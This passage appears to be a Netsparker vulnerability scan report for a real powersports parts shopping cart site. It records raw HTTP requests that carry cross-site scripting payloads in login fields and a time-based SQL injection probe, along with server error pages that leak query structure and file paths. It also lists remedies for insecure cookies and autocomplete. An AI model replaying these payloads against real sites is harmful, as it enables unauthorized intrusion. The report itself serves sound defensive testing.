.Copywrite {FONT-SIZE: 9px; COLOR: #4c6b55; LINE-HEIGHT: 11px; FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif; TEXT-DECORATION: none}

-->
</style>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
There was an error. <br>If this continues, please call HLSM at: 570-719-9000 <br>ASP Description: Syntax error in string in query expression 'Field14 = ''"--></style></script><script>netsparker(0x0002AE)</script>''. <br>ASP File: /xtremepowersports/shoppingcart/SendHint/ProcessHint.asp <br>ASP Line: 133 <br>ASP Number: -2147217900 <br>
<P>&nbsp;</P>

</BODY>
</HTML>
- /xtremepowersports/shoppingcart/hold/ProcessHold.asp

/xtremepowersports/shoppingcart/hold/ProcessHold.asp CONFIRMED

https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/hold/ProcessHold.asp

Parameters

Parameter Type Value
Returning POST Continue
txtEmail POST '"--></style></script><script>alert(0x0002EB)</script>
txtPassword POST 3
Type POST 21

Request

POST /xtremepowersports/shoppingcart/hold/ProcessHold.asp HTTP/1.1
Referer: https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/hold/ProcessHold.asp?Type=21
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.onlinemicrofiche.com
Cookie: ASPSESSIONIDQCSQTSDS=GLJKBIKAECEPABJMJKKMGAGI
Content-Length: 135
Accept-Encoding: gzip, deflate

Returning=Continue&txtEmail='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0002EB)%3c%2fscript%3e&txtPassword=3&Type=21

Response

HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 04:00:08 GMT
Content-Length: 1427
Content-Type: text/html
Expires: Mon, 02 May 2011 04:00:09 GMT
Cache-control: private




<HTML>
<HEAD>
<META NAME="GENERATOR" Content="Microsoft Visual Studio 6.0">
<style type="text/css">
<!--
.size1 {font-size:1pt;font-family: Arial,Helvetica,Sans-serif;}
.size2 {font-size:2pt;font-family: Arial,Helvetica,Sans-serif;}
.size3 {font-size:3pt;font-family: Arial,Helvetica,Sans-serif;}
.size4 {font-size:4pt;font-family: Arial,Helvetica,Sans-serif;}
.size6 {font-size:6pt;font-family: Arial,Helvetica,Sans-serif;}
.size7 {font-size:7pt;font-family: Arial,Helvetica,Sans-serif;}
.size8 {font-size:8pt;font-family: Arial,Helvetica,Sans-serif;}
.size10 {font-size:10pt;font-family: Arial,Helvetica,Sans-serif;}
.size12 {font-size:12pt;font-family: Arial,Helvetica,Sans-serif;}
.size14 {font-size:14pt;font-family: Arial,Helvetica,Sans-serif;}
.size16 {font-size:16pt;font-family:Arial, Helvetica, Sans-serif;}
.Copywrite {FONT-SIZE: 9px; COLOR: #4c6b55; LINE-HEIGHT: 11px; FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif; TEXT-DECORATION: none}

-->
</style>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
There was an error. <br>If this continues, please call HLSM at: 570-719-9000 <br>ASP Description: Syntax error in string in query expression 'Field14 = ''"--></style></script><script>netsparker(0x0002EB)</script>' and Field27 = '3''. <br>ASP File: /xtremepowersports/shoppingcart/hold/ProcessHold.asp <br>ASP Line: 198 <br>ASP Number: -2147217900 <br>
<P>&nbsp;</P>

</BODY>
</HTML>
- /xtremepowersports/shoppingcart/hold/ProcessHold.asp

/xtremepowersports/shoppingcart/hold/ProcessHold.asp CONFIRMED

https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/hold/ProcessHold.asp

Parameters

Parameter Type Value
Returning POST Continue
txtEmail POST netsparker@example.com
txtPassword POST '"--></style></script><script>alert(0x0002EC)</script>
Type POST 21

Request

POST /xtremepowersports/shoppingcart/hold/ProcessHold.asp HTTP/1.1
Referer: https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/hold/ProcessHold.asp?Type=21
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.onlinemicrofiche.com
Cookie: ASPSESSIONIDQCSQTSDS=GLJKBIKAECEPABJMJKKMGAGI
Content-Length: 158
Accept-Encoding: gzip, deflate

Returning=Continue&txtEmail=netsparker%40example.com&txtPassword='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0002EC)%3c%2fscript%3e&Type=21

Response

HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 04:00:13 GMT
Content-Length: 1448
Content-Type: text/html
Expires: Mon, 02 May 2011 04:00:13 GMT
Cache-control: private




<HTML>
<HEAD>
<META NAME="GENERATOR" Content="Microsoft Visual Studio 6.0">
<style type="text/css">
<!--
.size1 {font-size:1pt;font-family: Arial,Helvetica,Sans-serif;}
.size2 {font-size:2pt;font-family: Arial,Helvetica,Sans-serif;}
.size3 {font-size:3pt;font-family: Arial,Helvetica,Sans-serif;}
.size4 {font-size:4pt;font-family: Arial,Helvetica,Sans-serif;}
.size6 {font-size:6pt;font-family: Arial,Helvetica,Sans-serif;}
.size7 {font-size:7pt;font-family: Arial,Helvetica,Sans-serif;}
.size8 {font-size:8pt;font-family: Arial,Helvetica,Sans-serif;}
.size10 {font-size:10pt;font-family: Arial,Helvetica,Sans-serif;}
.size12 {font-size:12pt;font-family: Arial,Helvetica,Sans-serif;}
.size14 {font-size:14pt;font-family: Arial,Helvetica,Sans-serif;}
.size16 {font-size:16pt;font-family:Arial, Helvetica, Sans-serif;}
.Copywrite {FONT-SIZE: 9px; COLOR: #4c6b55; LINE-HEIGHT: 11px; FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif; TEXT-DECORATION: none}

-->
</style>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
There was an error. <br>If this continues, please call HLSM at: 570-719-9000 <br>ASP Description: Syntax error in string in query expression 'Field14 = 'netsparker@example.com' and Field27 = ''"--></style></script><script>netsparker(0x0002EC)</script>''. <br>ASP File: /xtremepowersports/shoppingcart/hold/ProcessHold.asp <br>ASP Line: 198 <br>ASP Number: -2147217900 <br>
<P>&nbsp;</P>

</BODY>
</HTML>
- /xtremepowersports/shoppingcart/hold/ProcessHold.asp

/xtremepowersports/shoppingcart/hold/ProcessHold.asp CONFIRMED

https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/hold/ProcessHold.asp

Parameters

Parameter Type Value
Type POST 21
txtEmail POST '"--></style></script><script>alert(0x00030B)</script>
txtPassword POST 3

Request

POST /xtremepowersports/shoppingcart/hold/ProcessHold.asp HTTP/1.1
Referer: https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/hold/ProcessHold.asp?Type=21
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.onlinemicrofiche.com
Cookie: ASPSESSIONIDQCSQTSDS=GLJKBIKAECEPABJMJKKMGAGI
Content-Length: 116
Accept-Encoding: gzip, deflate

Type=21&txtEmail='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x00030B)%3c%2fscript%3e&txtPassword=3

Response

HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 04:02:26 GMT
Content-Length: 1427
Content-Type: text/html
Expires: Mon, 02 May 2011 04:02:26 GMT
Cache-control: private




<HTML>
<HEAD>
<META NAME="GENERATOR" Content="Microsoft Visual Studio 6.0">
<style type="text/css">
<!--
.size1 {font-size:1pt;font-family: Arial,Helvetica,Sans-serif;}
.size2 {font-size:2pt;font-family: Arial,Helvetica,Sans-serif;}
.size3 {font-size:3pt;font-family: Arial,Helvetica,Sans-serif;}
.size4 {font-size:4pt;font-family: Arial,Helvetica,Sans-serif;}
.size6 {font-size:6pt;font-family: Arial,Helvetica,Sans-serif;}
.size7 {font-size:7pt;font-family: Arial,Helvetica,Sans-serif;}
.size8 {font-size:8pt;font-family: Arial,Helvetica,Sans-serif;}
.size10 {font-size:10pt;font-family: Arial,Helvetica,Sans-serif;}
.size12 {font-size:12pt;font-family: Arial,Helvetica,Sans-serif;}
.size14 {font-size:14pt;font-family: Arial,Helvetica,Sans-serif;}
.size16 {font-size:16pt;font-family:Arial, Helvetica, Sans-serif;}
.Copywrite {FONT-SIZE: 9px; COLOR: #4c6b55; LINE-HEIGHT: 11px; FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif; TEXT-DECORATION: none}

-->
</style>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
There was an error. <br>If this continues, please call HLSM at: 570-719-9000 <br>ASP Description: Syntax error in string in query expression 'Field14 = ''"--></style></script><script>netsparker(0x00030B)</script>' and Field27 = '3''. <br>ASP File: /xtremepowersports/shoppingcart/hold/ProcessHold.asp <br>ASP Line: 198 <br>ASP Number: -2147217900 <br>
<P>&nbsp;</P>

</BODY>
</HTML>
- /xtremepowersports/shoppingcart/hold/ProcessHold.asp

/xtremepowersports/shoppingcart/hold/ProcessHold.asp CONFIRMED

https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/hold/ProcessHold.asp

Parameters

Parameter Type Value
Type POST 21
txtEmail POST netsparker@example.com
txtPassword POST '"--></style></script><script>alert(0x00030C)</script>

Request

POST /xtremepowersports/shoppingcart/hold/ProcessHold.asp HTTP/1.1
Referer: https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/hold/ProcessHold.asp?Type=21
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.onlinemicrofiche.com
Cookie: ASPSESSIONIDQCSQTSDS=GLJKBIKAECEPABJMJKKMGAGI
Content-Length: 139
Accept-Encoding: gzip, deflate

Type=21&txtEmail=netsparker%40example.com&txtPassword='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x00030C)%3c%2fscript%3e

Response

HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 04:02:34 GMT
Content-Length: 1448
Content-Type: text/html
Expires: Mon, 02 May 2011 04:02:35 GMT
Cache-control: private




<HTML>
<HEAD>
<META NAME="GENERATOR" Content="Microsoft Visual Studio 6.0">
<style type="text/css">
<!--
.size1 {font-size:1pt;font-family: Arial,Helvetica,Sans-serif;}
.size2 {font-size:2pt;font-family: Arial,Helvetica,Sans-serif;}
.size3 {font-size:3pt;font-family: Arial,Helvetica,Sans-serif;}
.size4 {font-size:4pt;font-family: Arial,Helvetica,Sans-serif;}
.size6 {font-size:6pt;font-family: Arial,Helvetica,Sans-serif;}
.size7 {font-size:7pt;font-family: Arial,Helvetica,Sans-serif;}
.size8 {font-size:8pt;font-family: Arial,Helvetica,Sans-serif;}
.size10 {font-size:10pt;font-family: Arial,Helvetica,Sans-serif;}
.size12 {font-size:12pt;font-family: Arial,Helvetica,Sans-serif;}
.size14 {font-size:14pt;font-family: Arial,Helvetica,Sans-serif;}
.size16 {font-size:16pt;font-family:Arial, Helvetica, Sans-serif;}
.Copywrite {FONT-SIZE: 9px; COLOR: #4c6b55; LINE-HEIGHT: 11px; FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif; TEXT-DECORATION: none}

-->
</style>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
There was an error. <br>If this continues, please call HLSM at: 570-719-9000 <br>ASP Description: Syntax error in string in query expression 'Field14 = 'netsparker@example.com' and Field27 = ''"--></style></script><script>netsparker(0x00030C)</script>''. <br>ASP File: /xtremepowersports/shoppingcart/hold/ProcessHold.asp <br>ASP Line: 198 <br>ASP Number: -2147217900 <br>
<P>&nbsp;</P>

</BODY>
</HTML>
Cookie Not Marked As Secure

Cookie Not Marked As Secure

1 TOTAL
IMPORTANT
CONFIRMED
1
A Cookie was not marked as secure and transmitted over HTTPS. This means the cookie could potentially be stolen by an attacker who can successfully intercept and decrypt the traffic or following a successful MITM (Man in the middle) attack.

Impact

This cookie will be transmitted over a HTTP connection, therefore if this cookie is important (such as a session cookie) an attacker might intercept it and hijack a victim's session. If the attacker can carry out a MITM attack, he/she can force victim to make a HTTP request to steal the cookie.

Actions to Take

  1. See the remedy for solution.
  2. Mark all cookies used within the application as secure. (If the cookie is not related to authentication or does not carry any personal information you do not have to mark it as secure.))

Remedy

Mark all cookies used within the application as secure.

Required Skills for Successful Exploitation

To exploit this issue, the attacker needs to be able to intercept traffic. This generally requires local access to the web server or victim's network. Attackers need to be understand layer 2, have physical access to systems either as way points for the traffic, or locally (have gained access to) to a system between the victim and the web server.
- /xtremepowersports/shoppingcart/CheckOut/Navigation.asp

/xtremepowersports/shoppingcart/CheckOut/Navigation.asp CONFIRMED

https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CheckOut/Navigation.asp?Type=11

Identified Cookie

ASPSESSIONIDQCSQTSDS

Request

GET /xtremepowersports/shoppingcart/CheckOut/Navigation.asp?Type=11 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.onlinemicrofiche.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:17:27 GMT
Content-Length: 7841
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQTSDS=ILJKBIKAIOMMGIKBKLMAOPIL; path=/
Cache-control: private



<html>
<head>
<title>Xtreme Powersports' Check Out Navigation</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<script language="JavaScript"
src="https://seal.networksolutions.com/siteseal/javascript/siteseal.js"
type="text/javascript"></script>
<style type="text/css">
<!--
.size1 {font-size:1pt;font-family: Arial,Helvetica,Sans-serif;}
.size2 {font-size:2pt;font-family: Arial,Helvetica,Sans-serif;}
.size3 {font-size:3pt;font-family: Arial,Helvetica,Sans-serif;}
.size4 {font-size:4pt;font-family: Arial,Helvetica,Sans-serif;}
.size6 {font-size:6pt;font-family: Arial,Helvetica,Sans-serif;}
.size7 {font-size:7pt;font-family: Arial,Helvetica,Sans-serif;}
.size8 {font-size:8pt;font-family: Arial,Helvetica,Sans-serif;}
.size10 {font-size:10pt;font-family: Arial,Helvetica,Sans-serif;}
.size12 {font-size:12pt;font-family: Arial,Helvetica,Sans-serif;}
.size14 {font-size:14pt;font-family: Arial,Helvetica,Sans-serif;}
.size16 {font-size:16pt;font-family:Arial, Helvetica, Sans-serif;}
.Copywrite {FONT-SIZE: 9px; COLOR: #4c6b55; LINE-HEIGHT: 11px; FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif; TEXT-DECORATION: none}
-->
</style>
</head>
<body bgcolor="#FFFFFF" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<table width="155" border="0" Class=Size8>
<tr align="center" valign="top">
<td>
<!-- SiteSeal Html Builder Code:
Shows the logo at URL
https://seal.networksolutions.com/images/basicsqgreen.gif
Logo type is ("NETSB")
//-->
<script language="JavaScript" type="text/javascript">
SiteSeal("https://seal.networksolutions.com/images/basicsqgreen.gif",
"NETSB ", "none");</script><br><br>
<a href="../CustInfo/ProcessInfo.asp?Type=30" target="Main">Log In</a><br>
<a href="../CustInfo/ProcessInfo.asp?Type=30" target="Main">View Order History</a><br>
<a href="http://partsfinder.onlinemicrofiche.com/Xtremepowersports/partsfinder.htm" target="_top">OEM Parts Finder</a>
<br>
</td>
</tr>
</table>
<hr>

<table Class=Size8>
<tr align="center" valign="top">
<td>&nbsp;</td>
</tr>
</table>
<hr>

<table border="0" Class=Size8>
<tr>
<td colspan="2"><a name="PartsFinder"></a><font color="#0000CC"><b>Original Factory Parts</b></font></td>
</tr>
</Table>
<table border="0" Class=Size8>
<tr>
<td colspan="2"><font color="#0000CC"><b>Can-am</b></font></td>
</tr>
<tr>
<td width="11">&nbsp;</td>
<td width="120"><a href="http://partsfinder.onlinemicrofiche.com/Xtremepowersports/Canam_OEM/Canam.asp" target="_top">ATV
Models</a></td>
</tr>
<tr>
<td width="11">&nbsp;</td>
<td width="120"><a href="http://partsfinder.onlinemicrofiche.com/Xtremepowersports/Canam_OEM/canammc.asp" target="_top">Street Bike
Models</a></td>
</tr>
<tr>
<td colspan="2"><font color="#0000CC"><b>Honda</b></font></td>
</tr>
<tr>
<td width="11">&nbsp;</td>
<td width="120"><a href="http://partsfinder.onlinemicrofiche.com/Xtremepowersports/Honda_OEM/HondaATV.asp" target="_top">ATV
Models</a></td>
</tr>
<tr>
<td width="11">&nbsp;</td>
<td width="120"><a href="http://partsfinder.onlinemicrofiche.com/Xtremepowersports/Honda_OEM/HondaDB.asp" target="_top">Dirt
Bike Models</a></td>
</tr>
<tr>
<td width="11">&nbsp;</td>
<td width="120"><a href="http://partsfinder.onlinemicrofiche.com/Xtremepowersports/Honda_OEM/HondaMC.asp" target="_top">Street
Bike Models</a></td>
</tr>
<tr>
<td width="11">&nbsp;</td>
<td width="120"><a href="http://partsfinder.onlinemicrofiche.com/Xtremepowersports/Honda_OEM/HondaSC.asp" target="_top">Scooters Models</a></td>
</tr>
<tr>
<td colspan="2"><font color="#0000CC"><b>KTM</b></font></td>
</tr>
<tr>
<td width="11">&nbsp;</td>
<td width="120"><a href="http://partsfinder.onlinemicrofiche.com/Xtremepowersports/KTM_OEM/KTMATV.asp" target="_top">ATV
Models</a></td>
</tr>
<tr>
<td width="11">&nbsp;</td>
<td width="120"><a href="http://partsfinder.onlinemicrofiche.com/Xtremepowersports/KTM_OEM/KTMDB.asp" target="_top">Dirt Bike
Models</a></td>
</tr>
<tr>
<td colspan="2"><font color="#0000CC"><b>Sea Doo</b></font></td>
</tr>
<tr>
<td width="11">&nbsp;</td>
<td width="120"><a href="http://partsfinder.onlinemicrofiche.com/Xtremepowersports/Seadoo_OEM/Seadoo_PWC.asp" target="_top">PWC
Models</a></td>
</tr>
<tr>
<td width="11">&nbsp;</td>
<td width="120"><a href="http://partsfinder.onlinemicrofiche.com/Xtremepowersports/Seadoo_OEM/Seadoo_JB.asp" target="_top">Jet
Boat Models</a></td>
</tr>
<tr>
<td colspan="2"><font color="#0000CC"><b>Ski Doo</b></font></td>
</tr>
<tr>
<td width="11">&nbsp;</td>
<td width="120"><a href="http://partsfinder.onlinemicrofiche.com/Xtremepowersports/Skidoo_OEM/Skidoo.asp" target="_top">Snowmobile
Models</a></td>
</tr>
<tr>
<td colspan="2"><font color="#0000CC"><b>Suzuki</b></font></td>
</tr>
<tr>
<td width="11">&nbsp;</td>
<td width="120"><a href="http://partsfinder.onlinemicrofiche.com/Xtremepowersports/Suzuki_OEM/SuzukiATV.asp" target="_top">ATV
Models</a></td>
</tr>
<tr>
<td width="11">&nbsp;</td>
<td width="120"><a href="http://partsfinder.onlinemicrofiche.com/Xtremepowersports/Suzuki_OEM/SuzukiDB.asp" target="_top">Dirt
Bike Models</a></td>
</tr>
<tr>
<td width="11">&nbsp;</td>
<td width="120"><a href="http://partsfinder.onlinemicrofiche.com/Xtremepowersports/Suzuki_OEM/SuzukiMC.asp" target="_top">Street
Bike Models</a></td>
</tr>
<tr>
<td width="11">&nbsp;</td>
<td width="120"><a href="http://partsfinder.onlinemicrofiche.com/Xtremepowersports/Suzuki_OEM/SuzukiSC.asp" target="_top">Scooter
Models</a></td>
</tr>
<tr>
<td colspan="2"><font color="#0000CC"><b>Yamaha</b></font></td>
</tr>
<tr>
<td width="11">&nbsp;</td>
<td width="120"><a href="http://partsfinder.onlinemicrofiche.com/Xtremepowersports/Yamaha_OEM/YamahaATV.asp" target="_top">ATV
Models</a></td>
</tr>
<tr>
<td width="11" height="21">&nbsp;</td>
<td width="120"><a href="http://partsfinder.onlinemicrofiche.com/Xtremepowersports/Yamaha_OEM/YamahaUTIL.asp" target="_top">Utility
Vehicles</a></td>
</tr>
<tr>
<td width="11">&nbsp;</td>
<td width="120"><a href="http://partsfinder.onlinemicrofiche.com/Xtremepowersports/Yamaha_OEM/YamahaDB.asp" target="_top">Dirt
Bike Models</a></td>
</tr>
<tr>
<td width="11">&nbsp;</td>
<td width="120"><a href="http://partsfinder.onlinemicrofiche.com/Xtremepowersports/Yamaha_OEM/YamahaMC.asp" target="_top">Street
Bike Models</a></td>
</tr>
<tr>
<td width="11">&nbsp;</td>
<td width="120"><a href="http://partsfinder.onlinemicrofiche.com/Xtremepowersports/Yamaha_OEM/YamahaPWC.asp" target="_top">PWC
Models</a></td>
</tr>
<tr>
<td width="11">&nbsp;</td>
<td width="120"><a href="http://partsfinder.onlinemicrofiche.com/Xtremepowersports/Yamaha_OEM/YamahaJB.asp" target="_top">Jet
Boat Models</a></td>
</tr>
<tr>
<td width="11">&nbsp;</td>
<td width="120"><a href="http://partsfinder.onlinemicrofiche.com/Xtremepowersports/Yamaha_OEM/YamahaSC.asp" target="_top">Scooter
Models</a></td>
</tr>
<tr>
<td width="11">&nbsp;</td>
<td width="120"><a href="http://partsfinder.onlinemicrofiche.com/Xtremepowersports/Yamaha_OEM/YamahaSnow.asp" target="_top">Snowmobile
Models</a></td>
</tr>
</table>
<hr>
</body>
</html>
Internal Server Error

Internal Server Error

1 TOTAL
LOW
CONFIRMED
1
The Server responded with an HTTP status 500. This indicates that there is a server-side error. Reasons may vary. The behavior should be analysed carefully. If Netsparker is able to find a security issue in the same resource it will report this as a separate vulnerability.

Impact

The impact may vary depending on the condition. Generally this indicates poor coding practices, not enough error checking, sanitization and whitelisting. However there might be a bigger issue such as SQL Injection. If that's the case Netsparker will check for other possible issues and report them separately.

Remedy

Analyse this issue and review the application code in order to handle unexpected errors, this should be a generic practice which does not disclose further information upon an error. All errors should be handled server side only.
- /xtremepowersports/shoppingcart/CheckOut/Navigation.asp

/xtremepowersports/shoppingcart/CheckOut/Navigation.asp CONFIRMED

https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CheckOut/Navigation.asp?Type=%27;WAI..

Parameters

Parameter Type Value
Type GET ';WAITFOR DELAY '0:0:25'--

Request

GET /xtremepowersports/shoppingcart/CheckOut/Navigation.asp?Type=%27;WAITFOR%20DELAY%20%270:0:25%27-- HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.onlinemicrofiche.com
Cookie: ASPSESSIONIDQCSQTSDS=GLJKBIKAECEPABJMJKKMGAGI
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:17:50 GMT
Content-Length: 1343
Content-Type: text/html
Expires: Mon, 02 May 2011 03:17:50 GMT
Cache-control: private




<HTML>
<HEAD>
<META NAME="GENERATOR" Content="Microsoft Visual Studio 6.0">
<style type="text/css">
<!--
.size1 {font-size:1pt;font-family: Arial,Helvetica,Sans-serif;}
.size2 {font-size:2pt;font-family: Arial,Helvetica,Sans-serif;}
.size3 {font-size:3pt;font-family: Arial,Helvetica,Sans-serif;}
.size4 {font-size:4pt;font-family: Arial,Helvetica,Sans-serif;}
.size6 {font-size:6pt;font-family: Arial,Helvetica,Sans-serif;}
.size7 {font-size:7pt;font-family: Arial,Helvetica,Sans-serif;}
.size8 {font-size:8pt;font-family: Arial,Helvetica,Sans-serif;}
.size10 {font-size:10pt;font-family: Arial,Helvetica,Sans-serif;}
.size12 {font-size:12pt;font-family: Arial,Helvetica,Sans-serif;}
.size14 {font-size:14pt;font-family: Arial,Helvetica,Sans-serif;}
.size16 {font-size:16pt;font-family:Arial, Helvetica, Sans-serif;}
.Copywrite {FONT-SIZE: 9px; COLOR: #4c6b55; LINE-HEIGHT: 11px; FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif; TEXT-DECORATION: none}

-->
</style>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
There was an error. <br>If this continues, please call HLSM at: 570-719-9000 <br>ASP Description: Type mismatch: '[string: "';WAITFOR DELAY '0:0"]' <br>ASP File: /xtremepowersports/shoppingcart/CheckOut/Navigation.asp <br>ASP Line: 43 <br>ASP Number: -2146828275 <br>
<P>&nbsp;</P>

</BODY>
</HTML>
Auto Complete Enabled

Auto Complete Enabled

1 TOTAL
LOW
CONFIRMED
1
"Auto Complete" was enabled in one or more of the form fields. These were either "password" fields or important fields such as "Credit Card".

Impact

Data entered in these fields will be cached by the browser. An attacker who can access the victim's browser could steal this information. This is especially important if the application is commonly used in shared computers such as cyber cafes or airport terminals.

Remedy

Add the attribute autocomplete="off" to the form tag or to individual "input" fields.

Actions to Take

  1. See the remedy for the solution.
  2. Find all instances of inputs which store private data and disable autocomplete. Fields which contain data such as "Credit Card" or "CCV" type data should not be cached. You can allow the application to cache usernames and remember passwords, however, in most cases this is not recommended.
  3. Re-scan the application after addressing the identified issues to ensure that all of the fixes have been applied properly.

Required Skills for Successful Exploitation

Dumping all data from a browser can be fairly easy and there exist a number of automated tools to undertake this. Where the attacker cannot dump the data, he/she could still browse the recently visited websites and activate the auto-complete feature to see previously entered values.

External References

- /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp CONFIRMED

https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp?Type=30

Identified Field Name

txtPassword

Request

GET /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp?Type=30 HTTP/1.1
Referer: https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CheckOut/Navigation.asp?Type=11
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.onlinemicrofiche.com
Cookie: ASPSESSIONIDQCSQTSDS=GLJKBIKAECEPABJMJKKMGAGI
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:17:27 GMT
Content-Length: 3868
Content-Type: text/html
Cache-control: private


<html>
<head>
<title>Xtreme Powersports' Shopping Cart</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css">
<!--
.size1 {font-size:1pt;font-family: Arial,Helvetica,Sans-serif;}
.size2 {font-size:2pt;font-family: Arial,Helvetica,Sans-serif;}
.size3 {font-size:3pt;font-family: Arial,Helvetica,Sans-serif;}
.size4 {font-size:4pt;font-family: Arial,Helvetica,Sans-serif;}
.size6 {font-size:6pt;font-family: Arial,Helvetica,Sans-serif;}
.size7 {font-size:7pt;font-family: Arial,Helvetica,Sans-serif;}
.size8 {font-size:8pt;font-family: Arial,Helvetica,Sans-serif;}
.size10 {font-size:10pt;font-family: Arial,Helvetica,Sans-serif;}
.size12 {font-size:12pt;font-family: Arial,Helvetica,Sans-serif;}
.size14 {font-size:14pt;font-family: Arial,Helvetica,Sans-serif;}
.size16 {font-size:16pt;font-family:Arial, Helvetica, Sans-serif;}
.Copywrite {FONT-SIZE: 9px; COLOR: #4c6b55; LINE-HEIGHT: 11px; FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif; TEXT-DECORATION: none}
-->
</style>
</head>
<body bgcolor="#FFFFFF">
<p>&nbsp;</p>
<table width="286" border="0" align="center" class="size10">
<tr>
<td width="280" align="center">
<font color="#3333FF"><b>Sign-In To
Customer Information
</b></font>
</td>
</tr>
<tr>
<td width="280" align="center" valign="top" height="371">
<p>&nbsp;</p>
<table width="279" border="1" height="106" Class=size8>
<tr bgcolor="#000099" align="left" valign="middle" Class=size10>
<td height="25"><font color="#FFFFFF"><b>New Customer</b></font></td>
</tr>
<tr align="center" valign="middle">
<td height="75"><a href="ProcessInfo.asp?Type=41">New Customers Click Here</a></td>
</tr>
</table>
<p>&nbsp;</p>
<form name="form1" method="post" action="ProcessInfo.asp">
<input type="hidden" name="Type" value="30">
<table width="279" border="1" align="center">
<tr bgcolor="#000099" Class=size10>
<td><font color="#FFFFFF"><b>Returning Customer</b></font></td>
</tr>
<tr>
<td>
<table width="270" border="0" align="center" cellpadding="1" cellspacing="1" Class=size8>
<tr>
<td width="74" nowrap>
<div align="left">
Email<br>
Address</font>
</div>
</td>
<td width="187">
<input type="text" name="txtEmail" size="20" Class=size8>
</td>
</tr>
<tr>
<td width="74" nowrap>
<div align="left">Password</div>
</td>
<td width="187">
<input type="password" name="txtPassword" size="10" maxlength="10" Class=size8>
</td>
</tr>
<tr>
<td width="74" nowrap>&nbsp;</td>
<td width="187"><a href="../SendHint/ProcessHint.asp?Type=11">Did you forget your password?</a></td>
</tr>
</table>
</td>
</tr>
</table>
<br>
<input type="submit" name="Returning2" value="Continue" Class=size8>
</form>
</td>
</tr>
</table>

<table width="100%" border="0" cellspacing="0" cellpadding="0">
<TR>
<TD height=30>&nbsp;</TD>
</TR>
<tr align="center" valign="top" Class="Copywrite">
<td>Copyright � 2011 HLSM, Inc. All rights reserved. <br>
This material may not be published, broadcast, rewritten, or redistributed.<br>
For further information, contact HLSM, Inc.</td>
</tr>
</table></body>
</html>
Cookie Not Marked As HttpOnly

Cookie Not Marked As HttpOnly

1 TOTAL
LOW
CONFIRMED
1
Cookie was not marked as HTTPOnly. HTTPOnly cookies can not be read by client-side scripts therefore marking a cookie as HTTPOnly can provide an additional layer of protection against Cross-site Scripting attacks..

Impact

During a Cross-site Scripting attack an attacker might easily access cookies and hijack the victim's session.

Actions to Take

  1. See the remedy for solution
